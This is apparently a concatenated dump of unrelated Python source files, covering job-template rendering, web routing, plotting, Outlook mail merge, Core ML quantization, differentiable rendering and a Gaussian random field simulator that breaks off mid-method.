# Import
from .EchoTextClassifier import EchoTextClassifier
| 61 | 20 |
import subprocess
import logging
import os
from pathlib import Path
from ..docker import docker
import jinja2
log = logging.getLogger(__name__)
TEMPLATES = Path(__file__).parent.parent.parent.resolve() / 'templates'
def set_volumes_paths(substitutions=None):
    """Sets the volumes paths in the job options.

    Fills *substitutions* with the configuration values and, per known
    repository, the volume-mount string and a git version fingerprint
    (tag + md5 of the uncommitted diff) when local repos are mounted.

    Fixes: the mutable-default argument ``substitutions={}`` (the dict
    was mutated and returned, so repeated no-arg calls shared state) and
    the deprecated ``log.warn`` alias.

    :param substitutions: dictionary containing the job options
    :returns: the job options
    :rtype: dict
    """
    if substitutions is None:
        substitutions = {}
    from ..configuration import config
    substitutions['config'] = config
    substitutions['liquid_domain'] = config.liquid_domain
    substitutions['liquid_volumes'] = config.liquid_volumes
    substitutions['liquid_collections'] = config.liquid_collections
    substitutions['liquid_http_port'] = config.liquid_http_port
    substitutions['liquid_2fa'] = config.liquid_2fa
    substitutions['check_interval'] = config.check_interval
    substitutions['check_timeout'] = config.check_timeout
    substitutions['consul_url'] = config.consul_url
    substitutions['exec_command'] = docker.exec_command_str
    substitutions['https_enabled'] = config.https_enabled
    if config.https_enabled:
        substitutions['liquid_https_port'] = config.liquid_https_port
        substitutions['acme_email'] = config.https_acme_email
        substitutions['acme_caServer'] = config.https_acme_caServer
    # Known repositories: org, local checkout path, mount target in the
    # container.
    repos = {
        'snoop2': {
            'org': 'hoover',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-snoop2'),
            'target': '/opt/hoover/snoop'
        },
        'search': {
            'org': 'hoover',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-search'),
            'target': '/opt/hoover/search'
        },
        'ui_src': {
            'org': 'hoover',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-ui/src'),
            'target': '/opt/hoover/ui/src'
        },
        'ui_pages': {
            'org': 'hoover',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-ui/pages'),
            'target': '/opt/hoover/ui/pages'
        },
        'ui_styles': {
            'org': 'hoover',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-ui/styles'),
            'target': '/opt/hoover/ui/styles'
        },
        'core': {
            'org': 'liquidinvestigations',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'core'),
            'target': '/app'
        },
        'authproxy': {
            'org': 'liquidinvestigations',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'authproxy'),
            'target': '/app'
        },
        'codimd_server': {
            'org': 'liquidinvestigations',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'codimd-server'),
            'target': '/app',
        },
        'dokuwiki': {
            'org': 'liquidinvestigations',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'liquid-dokuwiki'),
            'target': '/liquid',
        },
    }
    for repo, repo_config in repos.items():
        key_repo = f"{repo_config['org']}_{repo}_repo"
        key_git = f"{repo_config['org']}_{repo}_git"
        substitutions[key_repo] = ''
        substitutions[key_git] = ''
        if config.mount_local_repos:
            if Path(repo_config['local']).is_dir():
                substitutions[key_repo] = f"\"{repo_config['local']}:{repo_config['target']}\",\n"
                # Fingerprint the checkout: nearest tag + md5 of dirty diff.
                tag = subprocess.check_output(
                    f"git -C {repo_config['local']} describe --tags --dirty --broken",
                    shell=True,
                ).decode('utf-8').strip()
                md5sum = subprocess.check_output(
                    f"git -C {repo_config['local']} diff HEAD | md5sum",
                    shell=True,
                ).decode('utf-8').strip()
                substitutions[key_git] = tag + md5sum
            else:
                log.warning(f'Invalid repo path "{repo_config["local"]}"')
    return substitutions
def render(template, subs):
    """Render a jinja2 template string using ``${...}`` variable markers."""
    from ..configuration import config
    environment = jinja2.Environment(
        variable_start_string="${",
        variable_end_string="}",
        loader=jinja2.FileSystemLoader(str(config.templates)),
    )
    # Expose a couple of builtins for use inside templates.
    environment.globals['int'] = int
    environment.globals['max'] = max
    compiled = environment.from_string(template)
    return compiled.render(subs)
def get_job(hcl_path, substitutions={}):
    """Return the job description generated from the given template.

    :param hcl_path: the path to the hcl template file
    :param substitutions: dictionary containing the job options
    :returns: the job description
    :rtype: str
    """
    with hcl_path.open() as handle:
        source = handle.read()
    return render(source, set_volumes_paths(substitutions))
class Job:
    """Base description of a deployable job; subclasses override these.

    NOTE(review): attribute semantics inferred from names and usage
    elsewhere in the package -- confirm against concrete subclasses.
    """
    vault_secret_keys = ()
    core_oauth_apps = ()
    stage = 2
    generate_oauth2_proxy_cookie = False
    extra_secret_fn = None
| 5,053 | 1,550 |
import morepath
class app(morepath.App):
    """Morepath application that the registrations below attach to."""
    pass
class StaticMethod(object):
    """Marker model published at the 'static' path."""
    pass
class Root(object):
    """Simple root model carrying a marker value."""
    def __init__(self):
        self.value = 'ROOT'
# NOTE(review): a module-level @staticmethod is unusual -- this appears to
# exercise morepath's handling of staticmethod-wrapped path factories.
@staticmethod
@app.path(model=StaticMethod, path='static')
def static_method():
    """Path factory returning the model instance for /static."""
    return StaticMethod()
@app.view(model=StaticMethod)
def static_method_default(self, request):
    """Default view for StaticMethod: fixed text response body."""
    return "Static Method"
| 389 | 125 |
from django.urls import include
from django.conf.urls import url
from rest_framework.routers import SimpleRouter
from rest_framework_nested.routers import NestedSimpleRouter
from .views import (
HostViewSet,
HostAdminViewSet,
ClusterViewSet,
InfobaseViewSet,
)
# Router wiring: hosts -> admins, and hosts -> clusters -> infobases.
host_router = SimpleRouter()
host_router.register(r'hosts', HostViewSet, basename='host')
# Nested under /hosts/{host_pk}/: admins
host_admin_router = NestedSimpleRouter(host_router, r'hosts', lookup='host')
host_admin_router.register(r'admins', HostAdminViewSet, basename='host-admin')
# Nested under /hosts/{host_pk}/: clusters
cluster_router = NestedSimpleRouter(host_router, r'hosts', lookup='host')
cluster_router.register(r'clusters', ClusterViewSet, basename='cluster')
# Nested under /hosts/{host_pk}/clusters/{cluster_pk}/: infobases
infobase_router = NestedSimpleRouter(cluster_router, r'clusters', lookup='cluster')
infobase_router.register(r'infobases', InfobaseViewSet, basename='infobase')
# NOTE(review): django.conf.urls.url was removed in Django 4.0; re_path is
# the modern equivalent -- confirm the project's Django version.
urlpatterns = [
    url(r'^', include(host_router.urls)),
    url(r'^', include(host_admin_router.urls)),
    url(r'^', include(cluster_router.urls)),
    url(r'^', include(infobase_router.urls)),
]
| 1,035 | 338 |
import matplotlib.pyplot as plt
import imageio
import os
import numpy as np
class GIFPloter():
    """Plots training snapshots (latent layers + loss curves) and collects
    the saved .png frames into an animated GIF.

    NOTE(review): indentation reconstructed from a whitespace-mangled
    source; statement grouping inside methods should be re-verified.
    """
    def __init__(self, args, model):
        # 'Li' and 'Zang' are two subplot-layout schemes; 'Li' is active.
        self.plot_method = 'Li'
        self.gif_axlist = []
        self.clist = ['r', 'g', 'b', 'y', 'm', 'c', 'k',
                      'pink', 'lightblue', 'lightgreen', 'grey']
        self.fig, self.ax = plt.subplots()
        self.his_loss = None  # lazily initialised list-of-lists in update_loss()
        self.NetworkStructure = args['NetworkStructure']
        self.current_subfig_index = 2
        self.plot_every_epoch = args['PlotForloop']
        self.infor_index_list = model.plot_index_list
        self.name_list = model.name_list
        self.num_subfig = len(model.plot_index_list)
        self.layer_num = len(args['NetworkStructure']) - 1
        if self.plot_method == 'Zang':
            # Near-square grid of subplots.
            self.num_fig_every_row = int(np.sqrt(self.num_subfig))+1
            self.num_row = int(1+(self.num_subfig - 0.5) //
                               self.num_fig_every_row)
            self.sub_position_list = [i+1 for i in range(self.num_subfig)]
        if self.plot_method == 'Li':
            # Two columns: odd positions down the left, the middle figure,
            # then even positions back up the right.
            self.num_fig_every_row = 2
            self.num_row = int(1+(self.num_subfig - 0.5) //
                               self.num_fig_every_row)
            self.sub_position_list = [i*2 + 1 for i in range(self.num_subfig//2)] +\
                [self.num_subfig] + \
                list(reversed([i*2 + 2 for i in range(self.num_subfig//2)]))
    def PlotOtherLayer(self, fig,
                       data, label,
                       title='',
                       fig_position0=1,
                       fig_position1=1,
                       fig_position2=1,
                       s=8):
        """Scatter one layer's activations into subplot *fig_position2*.

        Data with more than 3 columns is first reduced to 2-D with PCA;
        3-D data gets a 3-D scatter, 2-D data a flat scatter.
        """
        from sklearn.decomposition import PCA
        # input(fig_position)
        color_list = []
        for i in range(label.shape[0]):
            color_list.append(int(label[i]))
        if data.shape[1] > 3:
            pca = PCA(n_components=2)
            try:
                data_em = pca.fit_transform(data)
            except:
                # PCA can fail on extreme values: clamp/rescale and retry.
                print("Error in plot latent space: PCA.")
                data_max = np.max(data) if np.max(data) < 1e30 else 1e30
                data_min = np.min(data) if np.min(data) > 1e-5 else 1e-2
                data -= data_min
                data /= data_max
                data_em = pca.fit_transform(data)
        else:
            data_em = data
        # Center the embedding for display.
        data_em = data_em - data_em.mean(axis=0)
        if data_em.shape[1] == 3:
            ax = fig.add_subplot(fig_position0, fig_position1,
                                 fig_position2, projection='3d')
            ax.scatter(
                data_em[:, 0], data_em[:, 1], data_em[:, 2],
                c=color_list, s=s, cmap='rainbow')
        if data_em.shape[1] == 2:
            ax = fig.add_subplot(fig_position0, fig_position1, fig_position2)
            ax.scatter(
                data_em[:, 0], data_em[:, 1], c=label, s=s, cmap='rainbow')
        plt.axis('equal')
        plt.title(title)
        self.current_subfig_index = self.current_subfig_index+1
    def update_loss(self, loss=None):
        """ 0721, append loss list """
        # First call allocates one history list per loss component.
        if self.his_loss is None and loss is not None:
            self.his_loss = [[] for i in range(len(loss))]
        elif loss is not None:
            for i, loss_item in enumerate(loss):
                self.his_loss[i].append(loss_item)
    def AddNewFig(self, output_info, label_point, loss=None, title_='', save=True):
        """Render one snapshot figure: every tracked layer plus, when
        *loss* is given, the accumulated loss-history subplot."""
        self.update_loss(loss)
        self.current_subfig_index = 1
        fig = plt.figure(figsize=(5*self.num_fig_every_row, 5*self.num_row))
        for i, index in enumerate(self.infor_index_list):
            self.PlotOtherLayer(
                fig, output_info[index],
                label_point, title=self.name_list[index],
                fig_position0=self.num_row,
                fig_position1=self.num_fig_every_row,
                fig_position2=int(self.sub_position_list[i]))
        if loss is not None:
            loss_interval = 200  # x-axis step between recorded loss points
            # Element-wise sum across all loss components (missing entries
            # are skipped).
            loss_sum = []
            for i in range(len(self.his_loss[1])):
                tmp = 0
                for j in range(len(self.his_loss)):
                    try:
                        tmp += self.his_loss[j][i]
                    except:
                        pass
                loss_sum.append(tmp)
            # add new subplot
            ax = fig.add_subplot(self.num_row, self.num_fig_every_row,
                                 int(max(self.sub_position_list))+1)
            l1, = ax.plot(
                [i*loss_interval for i in range(len(self.his_loss[0]))],
                self.his_loss[0], 'bo-')
            l2, = ax.plot(
                [i*loss_interval for i in range(len(self.his_loss[0]))],
                self.his_loss[1], 'ko-')
            l3, = ax.plot(
                [i*loss_interval for i in range(len(self.his_loss[0]))],
                self.his_loss[2], 'yo-')
            l4, = ax.plot(
                [i*loss_interval for i in range(len(self.his_loss[0]))],
                self.his_loss[3], 'ro-')
            l5, = ax.plot(
                [i*loss_interval for i in range(len(self.his_loss[0]))],
                self.his_loss[4], 'mo-')
            l6, = ax.plot(
                [i*loss_interval for i in range(len(self.his_loss[0]))],
                self.his_loss[5], 'go-')
            l7, = ax.plot(
                [i*loss_interval for i in range(len(self.his_loss[0]))],
                loss_sum, 'co-')
            ax.legend((l1, l2, l3, l4, l5, l6, l7),
                      ('dis', 'push', 'ang', 'orth', 'pad', 'ae', 'sum'))
            # loss
            plt.title('loss history')
        plt.tight_layout()
        if save:
            plt.savefig(title_+'.png', dpi=300)
        plt.close()
    def SaveGIF(self, path):
        """Assemble every .png in *path* (sorted by name) into latent.gif."""
        gif_images_path = os.listdir(path+'/')
        gif_images_path.sort()
        print(gif_images_path)
        gif_images = []
        for _, path_ in enumerate(gif_images_path):
            print(path_)
            if '.png' in path_:
                # print(path+'/'+path_)
                gif_images.append(imageio.imread(path+'/'+path_))
        imageio.mimsave(path+'/'+"latent.gif", gif_images, fps=10)
| 6,292 | 2,062 |
import logging
import os
import win32com.client
import pandas as pd
logging.basicConfig(level=logging.INFO)
# Mail-merge inputs: an Outlook .msg template and an Excel recipient sheet.
templateName = "Template.msg"
recipientsFile = "Recipients.xlsx"
logging.info('Violet App Start')
path = os.getcwd()
logging.info('Current Directory {}'.format(path))
# Open the template message through the Outlook COM interface.
outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace("MAPI")
mail = outlook.OpenSharedItem(os.path.join(path, templateName))
logging.info("件名: {}".format(mail.subject))
logging.info("本文: {}".format(mail.HTMLBody))
originalBody = mail.HTMLBody
df = pd.read_excel(os.path.join(path, recipientsFile), sheet_name='Recipients')
logging.info(df)
outputDir = os.path.join(path, 'output')
if not os.path.isdir(outputDir):
    os.mkdir(outputDir)
# One personalised .msg per spreadsheet row: the TO column sets the
# recipient, every other column name is treated as a placeholder token to
# substitute into the HTML body.
for index, row in df.iterrows():
    replacedBody = originalBody
    recipient = ""
    for indexName in row.index:
        logging.info("indexName {}".format(indexName))
        if indexName == "TO":
            mail.Recipients.Add(row[indexName])
            recipient = row[indexName]
        else:
            replacedBody = replacedBody.replace(indexName, row[indexName])
    mail.HTMLBody = replacedBody
    mail.SaveAs(os.path.join(outputDir, "{}.msg".format(recipient.replace("@", "_"))))
    # NOTE(review): Remove(1) assumes exactly one recipient was added this
    # iteration -- confirm rows never contain multiple TO columns.
    mail.Recipients.Remove(1)
logging.info('Violet App End')
from typing import List
from fastapi import APIRouter
from .. import database, schemas, models, oauth2
from sqlalchemy.orm import Session
from fastapi import APIRouter, Depends, status
from ..repository import backlog
router = APIRouter(prefix="/backlog", tags=["Backlog"])
get_db = database.get_db  # session dependency shared by all endpoints
@router.get("/", response_model=List[schemas.Backlog])
def get_all(
        db: Session = Depends(get_db)):
    """List all backlog items.

    NOTE(review): unlike every other endpoint here, no current-user
    dependency is required -- confirm that is intentional.
    """
    return backlog.get_all(db)
@router.get("/{id}", status_code=200, response_model=schemas.Backlog)
def get(
id: int,
db: Session = Depends(get_db),
current_user: schemas.User = Depends(oauth2.get_current_user)
):
return backlog.get(id, db)
@router.post("/", status_code=status.HTTP_201_CREATED)
def create(
request: schemas.Backlog,
db: Session = Depends(get_db),
current_user: schemas.User = Depends(oauth2.get_current_user)
):
return backlog.create(request, db)
@router.delete("/{id}", status_code=status.HTTP_204_NO_CONTENT)
def destroy(
    id: int,
    db: Session = Depends(get_db),
    current_user: schemas.User = Depends(oauth2.get_current_user),
):
    """Delete the backlog item with the given id. Requires authentication."""
    return backlog.destroy(id, db)
@router.put("/{id}", status_code=status.HTTP_202_ACCEPTED)
def update(
    id: int,
    request: schemas.Backlog,
    db: Session = Depends(get_db),
    current_user: schemas.User = Depends(oauth2.get_current_user),
):
    """Replace the backlog item with the given id using the request body.

    Requires authentication.
    """
    return backlog.update(id, request, db)
| 1,409 | 504 |
from typing import Any, Callable, Optional
class cprop:
    """Class property: a descriptor that calls ``f`` with the *owning class*
    (not the instance) on attribute access, yielding a read-only, class-level
    computed attribute — usable where ``@classmethod`` + ``@property`` is not.
    """

    def __init__(self, f: Callable[..., str]):
        # The wrapped callable; receives the owner class as its sole argument.
        self.f = f

    def __get__(self, obj: Any, owner: Any) -> str:
        # ``owner`` is the class through which the attribute was accessed;
        # ``obj`` (the instance, possibly None) is deliberately ignored.
        return self.f(owner)
class Key:
    """Class which manages keys in :class:`anndata.AnnData`.

    Each helper builds the canonical string key under which a quantity is
    stored. ``bwd`` selects the backward ("bwd"/"from"/"initial") versus
    forward ("fwd"/"to"/"terminal") naming variant.
    """

    @classmethod
    def backward(cls, bwd: bool) -> str:
        """Direction suffix used by most keys."""
        return "bwd" if bwd else "fwd"

    @classmethod
    def where(cls, bwd: bool) -> str:
        """Preposition used in absorption-probability keys."""
        return "from" if bwd else "to"

    @classmethod
    def initial(cls, bwd: bool) -> str:
        """State-type prefix ("initial" vs "terminal")."""
        return "initial" if bwd else "terminal"

    @classmethod
    def cytotrace(cls, key: str) -> str:
        """CytoTRACE-prefixed key."""
        return f"ct_{key}"

    class obs:
        """Keys stored in ``adata.obs``."""

        @classmethod
        def probs(cls, key: str) -> str:
            return f"{key}_probs"

        @classmethod
        def macrostates(cls, bwd: bool) -> str:
            return f"macrostates_{Key.backward(bwd)}"

        @classmethod
        def term_states(cls, bwd: bool) -> str:
            return f"{Key.initial(bwd)}_states"

        @classmethod
        def priming_degree(cls, bwd: bool) -> str:
            return f"priming_degree_{Key.backward(bwd)}"

    class obsm:
        """Keys stored in ``adata.obsm``."""

        @classmethod
        def memberships(cls, key: str) -> str:
            return f"{key}_memberships"

        @classmethod
        def schur_vectors(cls, bwd: bool) -> str:
            return f"schur_vectors_{Key.backward(bwd)}"

        @classmethod
        def macrostates(cls, bwd: bool) -> str:
            return f"macrostates_{Key.backward(bwd)}"

        @classmethod
        def abs_probs(cls, bwd: bool) -> str:
            # Consistency: reuse Key.where instead of re-inlining the
            # "from"/"to" choice (same output as before).
            return f"{Key.where(bwd)}_{Key.obs.term_states(bwd)}"

        @classmethod
        def abs_times(cls, bwd: bool) -> str:
            return f"absorption_times_{Key.backward(bwd)}"

    class varm:
        """Keys stored in ``adata.varm``."""

        @classmethod
        def lineage_drivers(cls, bwd: bool) -> str:
            # Consistency: reuse Key.initial (was inlined); the ``-> str``
            # annotation was missing here and is added to match every sibling.
            return f"{Key.initial(bwd)}_lineage_drivers"

    class uns:
        """Keys stored in ``adata.uns``."""

        @classmethod
        def kernel(cls, bwd: bool, key: Optional[str] = None) -> str:
            """Transition-matrix key; an explicit ``key`` overrides the default."""
            return key if key is not None else f"T_{Key.backward(bwd)}"

        @classmethod
        def estimator(cls, bwd: bool, key: Optional[str] = None) -> str:
            """Estimator key; an explicit ``key`` overrides the default."""
            return key if key is not None else f"{Key.backward(bwd)}_estimator"

        @classmethod
        def names(cls, key: str) -> str:
            return f"{key}_names"

        @classmethod
        def colors(cls, key: str) -> str:
            return f"{key}_colors"

        @classmethod
        def eigen(cls, bwd: bool) -> str:
            return f"eigendecomposition_{Key.backward(bwd)}"

        @classmethod
        def schur_matrix(cls, bwd: bool) -> str:
            return f"schur_matrix_{Key.backward(bwd)}"

        @classmethod
        def coarse(cls, bwd: bool) -> str:
            return f"coarse_{Key.backward(bwd)}"
| 2,902 | 972 |
#!/usr/local/bin/python3
import coremltools.models
import coremltools.models.neural_network
import os.path
# Quantize the bundled Core ML models' weights from fp32 to fp16 *in place*,
# roughly halving the on-disk model footprint without changing the model API.
models_dir = os.path.join(os.path.dirname(__file__), "..", "Solving Bee", "Resources")
for model_name in ["LettersModel", "BoardModel"]:
    model_path = os.path.join(models_dir, f"{model_name}.mlmodel")
    model_fp32 = coremltools.models.MLModel(model_path)
    # nbits=16 -> half-precision weights; the result overwrites the original file.
    model_fp16 = coremltools.models.neural_network.quantization_utils.quantize_weights(model_fp32, nbits=16)
    model_fp16.save(model_path)
| 510 | 192 |
import pyredner
import redner
import numpy as np
import torch
import math
# Example of optimizing vertex color of a sphere.
# Pipeline: render a randomly-colored target, then recover the vertex colors
# from a gray initial guess by gradient descent on the radiance L2 loss.
# Use GPU if available
pyredner.set_use_gpu(torch.cuda.is_available())
cam = pyredner.Camera(position = torch.tensor([0.0, 0.0, -5.0]),
                      look_at = torch.tensor([0.0, 0.0, 0.0]),
                      up = torch.tensor([0.0, 1.0, 0.0]),
                      fov = torch.tensor([45.0]), # in degree
                      clip_near = 1e-2, # needs to > 0
                      resolution = (256, 256))
# Set "use_vertex_color = True" to use vertex color
mat_vertex_color = pyredner.Material(use_vertex_color = True)
materials = [mat_vertex_color]
vertices, indices, uvs, normals = pyredner.generate_sphere(128, 64)
# For the target we randomize the vertex color.
vertex_color = torch.zeros_like(vertices).uniform_(0.0, 1.0)
shape_sphere = pyredner.Shape(\
    vertices = vertices,
    indices = indices,
    uvs = uvs,
    normals = normals,
    colors = vertex_color, # use the 'colors' field in Shape to store the color
    material_id = 0)
shapes = [shape_sphere]
# Environment-map lighting loaded from an HDR image.
envmap = pyredner.imread('sunsky.exr')
if pyredner.get_use_gpu():
    envmap = envmap.cuda(device = pyredner.get_device())
envmap = pyredner.EnvironmentMap(envmap)
scene = pyredner.Scene(cam, shapes, materials, [], envmap)
# Request radiance plus per-pixel interpolated vertex color; the extra
# channels are appended after the RGB radiance in the output image.
scene_args = pyredner.RenderFunction.serialize_scene(\
    scene = scene,
    num_samples = 256,
    max_bounces = 1,
    channels = [redner.channels.radiance, redner.channels.vertex_color])
render = pyredner.RenderFunction.apply
img = render(0, *scene_args)
img_radiance = img[:, :, :3]
img_vertex_color = img[:, :, 3:]
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/target.exr')
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/target.png')
pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/target_color.png')
# Re-read the target so the optimization compares against the saved EXR.
target_radiance = pyredner.imread('results/test_vertex_color/target.exr')
if pyredner.get_use_gpu():
    target_radiance = target_radiance.cuda()
# Initial guess. Set to 0.5 for all vertices.
shape_sphere.colors = \
    torch.zeros_like(vertices, device = pyredner.get_device()) + 0.5
shape_sphere.colors.requires_grad = True
# We render both the radiance and the vertex color here.
# The vertex color is only for visualization.
scene_args = pyredner.RenderFunction.serialize_scene(\
    scene = scene,
    num_samples = 256,
    max_bounces = 1,
    channels = [redner.channels.radiance, redner.channels.vertex_color])
img = render(1, *scene_args)
img_radiance = img[:, :, :3]
img_vertex_color = img[:, :, 3:]
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/init.png')
pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/init_color.png')
diff = torch.abs(target_radiance - img_radiance)
pyredner.imwrite(diff.cpu(), 'results/test_vertex_color/init_diff.png')
optimizer = torch.optim.Adam([shape_sphere.colors], lr=1e-2)
for t in range(100):
    print('iteration:', t)
    optimizer.zero_grad()
    # Far fewer samples per iteration than for the target render; noisy
    # renders are cheap and still drive the optimizer. The first argument of
    # render (t+1) presumably seeds the sampler — varies per iteration.
    scene_args = pyredner.RenderFunction.serialize_scene(\
        scene = scene,
        num_samples = 4,
        max_bounces = 1,
        channels = [redner.channels.radiance, redner.channels.vertex_color])
    img = render(t+1, *scene_args)
    img_radiance = img[:, :, :3]
    img_vertex_color = img[:, :, 3:]
    pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/iter_{}.png'.format(t))
    pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/iter_color_{}.png'.format(t))
    loss = torch.pow(img_radiance - target_radiance, 2).sum()
    print('loss:', loss.item())
    loss.backward()
    optimizer.step()
    # Clamp the data to valid range.
    shape_sphere.colors.data.clamp_(0.0, 1.0)
# Final high-quality render of the optimized result.
scene_args = pyredner.RenderFunction.serialize_scene(\
    scene = scene,
    num_samples = 256,
    max_bounces = 1,
    channels = [redner.channels.radiance, redner.channels.vertex_color])
img = render(102, *scene_args)
img_radiance = img[:, :, :3]
img_vertex_color = img[:, :, 3:]
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/final.exr')
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/final.png')
pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/final_color.png')
pyredner.imwrite(torch.abs(target_radiance - img_radiance).cpu(), 'results/test_vertex_color/final_diff.png')
# Assemble the per-iteration frames into videos.
from subprocess import call
call(["ffmpeg", "-framerate", "24", "-i",
      "results/test_vertex_color/iter_%d.png", "-vb", "20M",
      "results/test_vertex_color/out.mp4"])
call(["ffmpeg", "-framerate", "24", "-i",
      "results/test_vertex_color/iter_color_%d.png", "-vb", "20M",
      "results/test_vertex_color/out_color.mp4"])
import numpy as np
import os
from ..analysis import Sensitivity
from ..physics import Cosmology
from ..physics.Constants import c, cm_per_mpc
from ..util.ParameterFile import ParameterFile
from .FourierSpace import FourierSpace
"""
------------
Instructions
------------
The GRF module allows the user to generate realizations of a Gaussian random field with an input power spectrum, and
compute power spectrum from a given map of fluctuations in real space.
This module has benefited a lot from the imapper2 package developed by Tony Li.
"""
class GaussianRandomField(FourierSpace):
    """Gaussian-random-field (GRF) simulator.

    Generates realizations of a GRF with a user-supplied power spectrum over a
    survey geometry, saves them to disk, and can project a true 3D power
    spectrum to an observed 2D one via a precomputed transfer matrix.
    """

    def __init__(self, **kwargs):
        FourierSpace.__init__(self, **kwargs)
        self.pf = ParameterFile(**kwargs)
        # Get the redshift of the interested signal
        self._z = self.pf.grf_params['grf_z_signal']
        # Survey geometry: number of channels along (x, y, z/LOS).
        # NOTE: "goemetry" is a long-standing typo kept for interface stability.
        self._survey_goemetry = np.array([self.pf.grf_params['grf_geom_x'],
                                          self.pf.grf_params['grf_geom_y'],
                                          self.pf.grf_params['grf_geom_z']])
        # Get the wavelength [cm] of the interested signal
        self.wv_signal = self.pf.grf_params['grf_lambda_signal']
        # Get the assumed aperture size (diameter) of dish
        self.d_ap = self.pf.grf_params['grf_d_ap']
        self._powerspectrum_in = self.pf.grf_params['grf_ps_in']

    @property
    def cosm(self):
        """Lazily-built :class:`Cosmology` from the parameter file."""
        if not hasattr(self, '_cosm'):
            self._cosm = Cosmology(
                omega_m_0=self.pf.cosmo_params['omega_m_0'],
                omega_l_0=self.pf.cosmo_params['omega_l_0'],
                omega_b_0=self.pf.cosmo_params['omega_b_0'],
                hubble_0=self.pf.cosmo_params['hubble_0'],
                helium_by_number=self.pf.cosmo_params['helium_by_number'],
                cmb_temp_0=self.pf.cosmo_params['cmb_temp_0'],
                approx_highz=self.pf.cosmo_params['approx_highz'],
                sigma_8=self.pf.cosmo_params['sigma_8'],
                primordial_index=self.pf.cosmo_params['primordial_index'])
        return self._cosm

    @property
    def sens(self):
        """Lazily-built :class:`Sensitivity`.

        BUGFIX: property getters cannot receive arguments, so the original
        ``def sens(self, **kwargs)`` always saw an empty ``kwargs``; the dead
        parameter is removed (behavior unchanged: ``Sensitivity()``).
        """
        if not hasattr(self, '_sens'):
            self._sens = Sensitivity()
        return self._sens

    @property
    def z(self):
        """Redshift of the target signal."""
        if not hasattr(self, '_z'):
            raise ValueError('must specify a redshift for which the fluctuations of target signal will be simulated!')
        return self._z

    @z.setter
    def z(self, value):
        # Only z = 6.0 is currently supported.
        if value in [6.0]:
            self._z = value
        else:
            raise ValueError('invalid signal redshift!')

    @property
    def survey_goemetry(self):
        """Survey geometry as an array (n_ch_x, n_ch_y, n_ch_z)."""
        if not hasattr(self, '_survey_goemetry'):
            raise ValueError('must specify a survey geometry for the simulation!')
        return self._survey_goemetry

    @survey_goemetry.setter
    def survey_goemetry(self, value):
        # np.all replaces np.alltrue (deprecated alias, removed in NumPy 2.0).
        if (np.all(value > 0)) and (np.size(value) == 3):
            self._survey_goemetry = value
        else:
            raise ValueError('input survey geometry invalid!')

    @property
    def PowerSpectrum(self):
        """Input power spectrum P(k); must be a callable of k."""
        if not hasattr(self, '_PowerSpectrum'):
            raise ValueError('To simulate a GRF, must supply an input PS!')
        return self._PowerSpectrum

    @PowerSpectrum.setter
    def PowerSpectrum(self, value):
        if callable(value):
            self._PowerSpectrum = value
        else:
            raise ValueError('Input power spectrum must be a callable function of k!')

    @property
    def n_ch_x(self):
        return self.survey_goemetry[0]

    @property
    def n_ch_y(self):
        return self.survey_goemetry[1]

    @property
    def n_ch_z(self):
        return self.survey_goemetry[2]

    @property
    def n_beam(self):
        # Number of spatial pixels (beams) on the sky plane.
        return self.survey_goemetry[0] * self.survey_goemetry[1]

    @property
    def n_channel(self):
        # Number of frequency (LOS) channels.
        return self.survey_goemetry[-1]

    def SetGrid(self, L_x, L_y, L_z):
        """
        Set x (real space) and k (fourier space) grids
        ----------------------------------------
        :param L_x: length of survey volume along 1st dimension; {scalar}
        :param L_y: length of survey volume along 2nd dimension; {scalar}
        :param L_z: length of survey volume along 3rd (LOS) dimension; {scalar}
        :return:
        """
        _lslab_x = L_x
        _lslab_y = L_y
        _lslab_z = L_z
        # Define the large simulation box within which the survey volume is embedded
        _lsim_x = _lsim_y = _lsim_z = _lslab_z  # Mpc h^-1
        _dx = _lslab_x / self.n_ch_x  # Mpc h^-1
        _dy = _lslab_y / self.n_ch_y  # Mpc h^-1
        _dz = _lslab_z / self.n_ch_z  # Mpc h^-1
        self.nx_sim = int(np.round(_lsim_x / _dx))
        self.ny_sim = int(np.round(_lsim_y / _dy))
        self.nz_sim = int(np.round(_lsim_z / _dz))
        # Symmetric real-space coordinates about the box center.
        self.xs = np.linspace(-self.nx_sim//2 + self.nx_sim%2, self.nx_sim//2 - 1 + self.nx_sim%2, self.nx_sim) * _dx
        self.ys = np.linspace(-self.ny_sim//2 + self.ny_sim%2, self.ny_sim//2 - 1 + self.ny_sim%2, self.ny_sim) * _dy
        self.zs = np.linspace(-self.nz_sim//2 + self.nz_sim%2, self.nz_sim//2 - 1 + self.nz_sim%2, self.nz_sim) * _dz
        self.r = np.sqrt(self.xs[:,np.newaxis,np.newaxis]**2 + self.ys[np.newaxis,:,np.newaxis]**2 + self.zs[np.newaxis,np.newaxis,:]**2)
        sim = np.zeros((self.nx_sim, self.ny_sim, self.nz_sim), float)
        self.npix_cen = self.nx_sim // 2 - 1
        if self.n_ch_y==1:
            # real-space weighting function (only the 2D/slab case is implemented)
            sim[int(self.npix_cen - (self.n_beam // 2)):int(self.npix_cen + (self.n_beam // 2)), self.npix_cen, 0:] = 1.0
        else:
            raise NotImplementedError('help!')
        _kx = 2*np.pi * np.fft.fftfreq(self.nx_sim, _dx)
        _ky = 2*np.pi * np.fft.fftfreq(self.ny_sim, _dy)
        _kz = 2*np.pi * np.fft.fftfreq(self.nz_sim, _dz)
        _dkx = abs(_kx[1] - _kx[0])
        _dky = abs(_ky[1] - _ky[0])
